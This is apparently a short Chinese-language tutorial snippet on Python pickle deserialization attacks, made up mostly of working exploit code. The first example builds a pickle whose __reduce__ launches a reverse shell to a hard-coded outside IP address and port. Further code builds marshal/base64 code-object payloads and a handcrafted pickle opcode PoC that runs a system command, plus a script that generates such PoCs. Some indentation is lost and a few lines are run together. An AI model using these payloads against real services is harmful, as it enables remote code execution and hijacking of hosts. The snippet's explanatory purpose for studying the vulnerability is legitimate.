import pickle
import os
class A(object):
def __reduce__(self):
a = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("121.195.170.181",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""
return (os.system,(a,))
a=A()
result = pickle.dumps(a)
pickle.loads(result)
如果pickle.loads内容可控,就可能导致Python反序列漏洞。上面的是反弹shell的例子。
import pickle
import marshal
import base64
import types
import os
def foo():
import os
def fib(n):
if n <= 1:
return n
return fib(n-1) + fib(n-2)
print 'fib(10) =', fib(10)
os.system('id') code_serialized = base64.b64encode(marshal.dumps(foo.func_code))
print code_serialized
#######1######
code_str = base64.b64decode(code_serialized)
code = marshal.loads(code_str)
func = types.FunctionType(code, globals(), '')
func()
#############2########(types.FunctionType(marshal.loads(base64.b64decode(code_serialized)), globals(), ''))()
poc='''ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'YwAAAAABAAAAAgAAAEMAAABzHQAAAGQBAGQAAGwAAH0AAHwAAGoBAGQCAIMBAAFkAABTKAMAAABOaf////90AgAAAGlkKAIAAAB 0AgAAAG9zdAYAAABzeXN0ZW0oAQAAAFIBAAAAKAAAAAAoAAAAAHMRAAAAcGlja2xlX2V4cF9nZW4ucHl0AwAAAGZvbwMAAABzBAAAA AABDAE='
tRtRc__builtin__
globals
(tRS''
tR(tR.
'''
pickle.loads(poc)
上面的1、2都可以进行反序列化
3、通过这个脚本生成poc
import marshal
import base64
def foo():
import os
os.system('id')
# Your code here print """ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR.""" % base64.b64encode(marshal.dumps(foo.func_code))
生成的poc如下
当反序列化可控,就能导致漏洞产生。
具体细节参考下面的链接。